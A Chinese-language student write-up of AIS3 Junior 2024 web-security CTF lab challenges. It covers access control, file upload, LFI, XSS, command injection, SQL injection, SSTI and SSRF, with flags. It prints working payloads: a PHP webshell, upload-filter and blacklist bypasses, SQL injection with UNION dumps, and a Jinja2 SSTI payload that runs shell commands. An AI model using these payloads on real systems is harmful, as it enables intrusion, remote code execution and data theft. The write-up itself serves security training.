# AIS3 junior 2024 網頁安全 y1w3n > 網頁安全 > 日期 8/16 > 講師: 徐牧遠 Red # 01 - Broken Access Control ## BAC01 ### 題目說明 ![image](https://hackmd.io/_uploads/S1bnHH390.png) 進去之後長這樣: ![image](https://hackmd.io/_uploads/BkvyUB3cC.png) ### <font color="#F7A004">solve</font> 用admin進去,發現它把我們視為一般使用者```/user``` ![image](https://hackmd.io/_uploads/Byqeyjn9C.png) 因為發現URL的地方還是user,所以==改成admin==得到答案 ![image](https://hackmd.io/_uploads/By1U1i35C.png) ### answer :::warning AIS3_Junior{FirstBROKENAccessControl;)} ::: ### note * 讓網頁未成功執行身份驗證機制 --- ## BAC02 ### 題目說明 ![image](https://hackmd.io/_uploads/H11iboh5R.png) 進去之後長這樣: ![image](https://hackmd.io/_uploads/ry2aWs250.png) 發現Product那邊現可以購買東西 ![image](https://hackmd.io/_uploads/SyPfzin9A.png) ### <font color="#F7A004">solve</font> 把每個都點進去看,去觀察URL那邊的ID :::spoiler 圖片 ||因為會洗版所以藏起來|| ![image](https://hackmd.io/_uploads/rJlpzjnq0.png) 1 ![image](https://hackmd.io/_uploads/r1vJXjncR.png) 2 ![image](https://hackmd.io/_uploads/rJQZXs350.png) 3 ![image](https://hackmd.io/_uploads/HkUHmo3c0.png) 5 ![image](https://hackmd.io/_uploads/HJkvmohqR.png) 6 ::: 就會發現==沒有4== 推測可能藏FLAG,去看看 ![image](https://hackmd.io/_uploads/By-ami2qC.png) 現在可以用0元買FLAG ### answer ![image](https://hackmd.io/_uploads/r1YzVs2cR.png) :::warning AIS3_Junior{BroJustFoundBabyIDORVulnerability} ::: # 02 - File Upload ## FIL01 ### 題目說明 ![image](https://hackmd.io/_uploads/B19FLr3cC.png) 進去之後長這樣: ![image](https://hackmd.io/_uploads/B1ikPS3qC.png) 然後有地方可以上傳檔案 ![image](https://hackmd.io/_uploads/SyFIDSh5C.png) ### <font color="#F7A004">solve</font> * **php webshell** ```php= <?php system($_GET['cmd']);?> ``` * ```system()``` 是 PHP 中的一個函數,用來執行系統層級的命令。它會將結果輸出給瀏覽器,同時返回命令的最後一行輸出 將含有以上內容的檔案上傳 * ```$_GET['cmd']```是 PHP 的一個全局變量,代表 URL 中的 GET 參數 cmd 的值 ![image](https://hackmd.io/_uploads/SykQOBhqA.png) 看到上傳成功但還是沒有FLAG 但注意到下方有: File upload to ==/uploads/c3644_108.160.138.201.php== 直接去看看ㄅ,會看到這個畫面 ![image](https://hackmd.io/_uploads/r1eDtSnqC.png) 在後面加上```/?cmd=id``` id可以替換為Linux的指令,先用ls看看有什麼 ![image](https://hackmd.io/_uploads/HyN6wL3cR.png) 發現沒什麼看似FLAG的檔案,那到其他地方看看: ```ls ../``` ![image](https://hackmd.io/_uploads/S15gdIh5R.png) 看到FLAG了,cat 它: ```cat ../FLAG``` ![image](https://hackmd.io/_uploads/SkADd8390.png) ### answer :::warning AIS3_Junior{FirstWEBSHELLXDDD} ::: ### note * 透過網頁執行系統命令達成RCE * 用最基礎的php webshell上傳 * ```/?cmd=id```: 顯示當前用戶的 UID,```cmd```是查詢參數 --- ## FIL02 ### 題目說明 ![image](https://hackmd.io/_uploads/HJByjIh9C.png) 進去之後長跟上一題一樣,但加了一些限制,然後被擋掉了 ![image](https://hackmd.io/_uploads/HyqH3Un9C.png) #### <font color="#F7A004">solve</font> 打開Burp在上傳之前去攔 ![image](https://hackmd.io/_uploads/HJXNxOhcC.png) 然後Content-Type: ```application/x-php```改成 ```image/jpg```後send ![image](https://hackmd.io/_uploads/Bkw_AD2cR.png) 就看到回覆了我上傳的地方 跟上一題一樣去看看 ![image](https://hackmd.io/_uploads/B1Djuah9R.png) ### answer :::warning AIS3_Junior{BabyUploadBypass} ::: # 03 - Local File Inclusion ## LFI01 ### 題目說明 ![image](https://hackmd.io/_uploads/rJ0yCQ69R.png) 進去之後長這樣: ![image](https://hackmd.io/_uploads/rJLdCXp90.png) 嘗試輸入一些東西,結果爆出ERROR ### <font color="#F7A004">solve</font> ```Ctrl+U```看原始碼 ![image](https://hackmd.io/_uploads/H191F_aqA.png) 進去註解的連結看看 ![image](https://hackmd.io/_uploads/By9wy80cC.png) 發現沒東西,網路上查到index.php會比較多資訊,所以==把```file=```後面改成index.php== ![image](https://hackmd.io/_uploads/H1tJsvR5R.png) 現在在原始碼的地方成功看到: **Account**(admin)跟**Password**(CATLOVEBITCOINMEOWMEOW) 回到一開始的URL輸入(http://ctfd-ais3.crazyfirelee.tw:9021/) ![image](https://hackmd.io/_uploads/BJUJavA50.png) ### answer :::warning AIS3_Junior{php://filter/BabyPHPLFI.b64decode()} ::: ### note * 因為index.php它有主要資訊架構,通常不會輕易顯示在URL裡 --- ## LFI02 ### 題目說明 ![image](https://hackmd.io/_uploads/S1uvRpCq0.png) ![image](https://hackmd.io/_uploads/SyQfW00cC.png) ### <font color="#F7A004">solve</font> 上傳檔案後看到下方出現: File upload to /tmp/c3644_108.160.138.201.php ![image](https://hackmd.io/_uploads/Bkj2EAC9A.png) 回到上傳檔案的地方 把form=後面改成```../../../../../tmp/c3644_108.160.138.201.php&cmd=ls``` ![image](https://hackmd.io/_uploads/S1FxwC0qC.png) 會看到疑似有FLAG的S3Cr3TFLAGGGGG ``` http://ctfd-ais3.crazyfirelee.tw:9022/post.php?form=../../../../../tmp/c3644_108.160.138.201.php&cmd=cat%20S3Cr3TFLAGGGGG ``` ![image](https://hackmd.io/_uploads/By3Q_0CcC.png) ### answer :::warning AIS3_Junior{../../../../tmp/BADBAD.php?LFI=SUCCESS} ::: ### note * 使用 ```../```來繞過應用程序的目錄限制 # 04 - Cross-Site Scripting ## XSS01 ### 題目說明 ![image](https://hackmd.io/_uploads/rkEV9u6qC.png) ![image](https://hackmd.io/_uploads/H1YDqdp5A.png) ### <font color="#F7A004">solve</font> ```<script>alert(FLAG);</script>``` ![image](https://hackmd.io/_uploads/HyaQs_aq0.png) ### answer :::warning AIS3_Junior{XSSXSSXSSXSS} ::: ### note [參考](https://tech-blog.cymetrics.io/posts/jo/zerobased-cross-site-scripting/) * 反射型XSS * 最常見 * 惡意腳本通過 URL 或表單提交等方式被立即反射到頁面並執行,不會被存 # 05 - Command Injection ## CMD01 ### 題目說明 ![image](https://hackmd.io/_uploads/ByVVJKaqA.png) ![image](https://hackmd.io/_uploads/Sy0A42TqR.png) 輸入localhost後: ![image](https://hackmd.io/_uploads/HJ_mB365R.png) ### <font color="#F7A004">solve</font> 在```;```後可以接上cmd的指令 ![image](https://hackmd.io/_uploads/HJyRHnp5A.png) 看到裡面有FLAG,輸入```localhost;cat FLAG```,得到答案 ![image](https://hackmd.io/_uploads/r1AiLh650.png) ### answer :::warning AIS3_Junior{BabyCommand;InjectionXDDDddddd} ::: ### note * localhost(127.0.0.1):通常這個命令會被忽略或者返回錯誤 * 指令串接 * ```; ``` : 結束指令並開始下一個指令 --- ## CMD02 ### 題目說明 ![image](https://hackmd.io/_uploads/r1zXunpc0.png) 進去之後跟CMD01那題一樣 發現要是跟上一題一樣直接加上指令輸入的話==會被擋住==,因為我們輸入了包含黑名單的內容 ![image](https://hackmd.io/_uploads/SJ7cIWRcR.png) ### <font color="#F7A004">solve1</font> ``` ;ca\t${IFS}FLAG ``` ![image](https://hackmd.io/_uploads/S1igY-R9C.png) ### <font color="#F7A004">solve2</font> ``` ;grep${IFS}-r${IFS}AIS3 ``` ![image](https://hackmd.io/_uploads/H1Qw_WC5A.png) ### <font color="#F7A004">solve3</font> ``` 11&python${IFS}* ``` ![image](https://hackmd.io/_uploads/HyBvYZ0q0.png) ### answer :::warning AIS3_Junior{niceWordBL$()ACKListEvasion;)} ::: ### note * ```${IFS}``` : 預設是空白 * ```11&python${IFS}*```: 利用python執行錯誤 * ```11&```: 前面阻斷調讓後面被執行 --- ## CMD3 & [Bonus] CMD06 ### 題目說明 (這兩題基本上一模一樣所以放在一起) :::spoiler 題目in CTFd ![image](https://hackmd.io/_uploads/SyQ7pb0qA.png) ![image](https://hackmd.io/_uploads/SyPEpbA5C.png) ::: ![image](https://hackmd.io/_uploads/Hkv2TbCq0.png) 進去一樣還是PING IP 的畫面,也是一樣有黑名單 ### <font color="#F7A004">solve</font> ``` 11|ca\t${IFS}FLAG ``` CMD03:![image](https://hackmd.io/_uploads/BJNjUfCqA.png) CMD06:![image](https://hackmd.io/_uploads/BJh7vGR9A.png) ### answer :::warning CMD03: ```AIS3_Junior{BashOperato|rEvasion${IFS}SUCC|ESSFUL|:DDDDD}``` CMD06: ```AIS3_Junior{ouo_hihi}``` ::: ### note # 06 - SQL Injection ## SQL01 ### 題目說明 ![image](https://hackmd.io/_uploads/ryxXhuf05R.png) 進去後是一個登入畫面 ![image](https://hackmd.io/_uploads/r1_etzRqC.png) ### <font color="#F7A004">solve</font> * Account: ```'OR 1=1-- ``` * Password: ```aaa``` (隨便輸入都可以) ![image](https://hackmd.io/_uploads/HJ_1qzA9C.png) ### answer ![image](https://hackmd.io/_uploads/S1YE9fAqA.png) :::warning AIS3_Junior{SQL'InjectionXDorD=D_--_-} ::: ### note * ```'OR 1=1--``` : 因為1=1必定成立且後面註解掉了,所以不管我在Password輸入什麼都不引響 [更多參考](https://tech-blog.cymetrics.io/posts/nick/sqli/) ![image](https://hackmd.io/_uploads/rkD8ofC9R.png) --- ## SQL02 ### 題目說明 ![image](https://hackmd.io/_uploads/rJjCsfC9R.png) 進去之後看到的是這個介面 ![image](https://hackmd.io/_uploads/r1yI0M0cR.png) ### <font color="#F7A004">solve</font> 首先我們先查在這個SQL資料庫中有幾個column,會發現是4個 ![image](https://hackmd.io/_uploads/SJ4PRM0qR.png) ![image](https://hackmd.io/_uploads/S1DK440qR.png) 現在不知道資料庫、table、column那些的名稱所以使用schema ```aaa' UNION SELECT 1 ,group_concat(schema_name) ,3 ,4 FROM information_schema.schemata#``` ![image](https://hackmd.io/_uploads/B1kIk11s0.png) 試出==table_schema='ApexPredators'== ```aaa' UNION SELECT 1 ,group_concat(table_name) ,3 ,4 FROM information_schema.tables WHERE table_schema='ApexPredators'#``` ![image](https://hackmd.io/_uploads/S1SDfy1oC.png) 找出==table_name='users'== ```aaa' UNION SELECT 1 ,group_concat(column_name) ,3 ,4 FROM information_schema.columns WHERE table_schema='ApexPredators' and table_name='users'#``` ![image](https://hackmd.io/_uploads/rJp9M1kjC.png) ``` aaa' UNION SELECT 1 ,isAdmin ,password ,username FROM ApexPredators.users#``` ![image](https://hackmd.io/_uploads/BJjg7ykiA.png) 得到: * Account: KubenBlisk * Password: BliskLeader#2024 回到Login頁面登入 ![image](https://hackmd.io/_uploads/SJX27JJj0.png) ### answer ![image](https://hackmd.io/_uploads/ryYO7kJsC.png) :::warning AIS3_Junior{_BRO-DO_A--UNION_SELECTXDDD_--_-} ::: ### note * 透過UNION能夠連接兩個相同column數的SELECT語句 * ```aaa' UNION SELECT 1 ,group_concat(schema_name) ,3 ,4```: 前後的SELECT語句都會執行,會找不到aaa所以是空的,接著後面執行```SELECT 1 ,group_concat(schema_name) ,3 ,4 FROM information_schema.schemata#``` * information_schema.schemata:裡面包含所有資料庫名稱 # 07 - Server-Side Template Injection ## STI01 & STI02 ### 題目說明 (方法相同所以寫再一起) ![image](https://hackmd.io/_uploads/HJxTLmFAcA.png) ![image](https://hackmd.io/_uploads/BkmRM5C5R.png) 一樣是Who are you然後要我們輸入東西 ![image](https://hackmd.io/_uploads/r1cKXK090.png) 嘗試用admin沒用 ![image](https://hackmd.io/_uploads/SkUc9FC5R.png) 用BAC01的方法```/user```改```/admin```會被說沒權限 ### <font color="#F7A004">solve</font> ``` {{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }} ``` 會看到列出了包含FLAG的目錄內容 ![image](https://hackmd.io/_uploads/BJmD3FR9R.png) 回到上一頁,把```ls```換成```cat FLAG```: ``` {{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat FLAG').read() }} ``` ![image](https://hackmd.io/_uploads/ByxCx9C50.png) ### answer :::warning SIT01: ```AIS3_Junior{.__JinjaTWOOOO.___["SSTI"]__.succ3ssXDD.__} ``` SIT02: ```AIS3_Junior{b4by__.filt3rEvasion.__Succ3ss}``` ::: ### note * SSTI Jinja2 * 可能允許攻擊者將payload放進username的參數中:```http://example.com/?username={{7*7}}```這時候一個具有SSTI漏洞的網頁就可能Response Hi 49 * ``{{}}``在Jinja2中作為變數包裹標識符,Jinja2在渲染的時候會把``{{}}``包裹的內容當作變數解析替換。例如``{{7*7}}``會被解析成49 * 證實此網頁含有SSTI漏洞![image](https://hackmd.io/_uploads/Hk4qG505A.png) # 08 - Server-Side Request Forgery ## SRF01 ### 題目說明 ![image](https://hackmd.io/_uploads/S1thV50cC.png) ![image](https://hackmd.io/_uploads/ByX5w60qC.png) ### <font color="#F7A004">solve</font> 觀察題目,發現它有給Flag Location: /app/FLAG 直接去看看 ``` File:///app/FLAG ``` 進到下一個頁面,Image顯示不出來,那用```f12```看看 ![image](https://hackmd.io/_uploads/r1NzdTA9R.png) ![image](https://hackmd.io/_uploads/SJlctTA9R.png) 看見一串base64,複製下來去解碼看看 ![image](https://hackmd.io/_uploads/S1phtTAcA.png) ### answer :::warning AIS3_Junior{file://SSRF___XDDD} ::: ### note * SSRF 攻擊發生在應用程序允許用戶指定一個 URL 或資源,並由服務器發送請求以獲取該資源的內容 --- ## SRF02 ### 題目說明 ![image](https://hackmd.io/_uploads/BJvh5TA9R.png) ![image](https://hackmd.io/_uploads/BJaWsa0c0.png) 右上角酷酷ㄉadmin panel 點進去發現出現==LOCAL ACCESS ONLY== ![image](https://hackmd.io/_uploads/Hynwi60cC.png) ### <font color="#F7A004">solve</font> 根據前面觀察到的內容**LOCAL ACCESS ONLY**推測這題可能是跟localhost的local有關 ``` http://localhost/local ``` ![image](https://hackmd.io/_uploads/BkFqe7pc0.png) 一樣又看到Image顯示不出來,```ctrl```+```u```去看看 ![image](https://hackmd.io/_uploads/r1162TRcC.png) 一樣又一串base64,複製下來去解碼看看 ![image](https://hackmd.io/_uploads/H11J6aRqA.png) ### answer :::warning AIS3_Junior{http://BROAccessLOCAL} ::: ### note * ```http://localhost/local``` 是一個指向本地服務器的 URL,通常在開發和測試環境中使用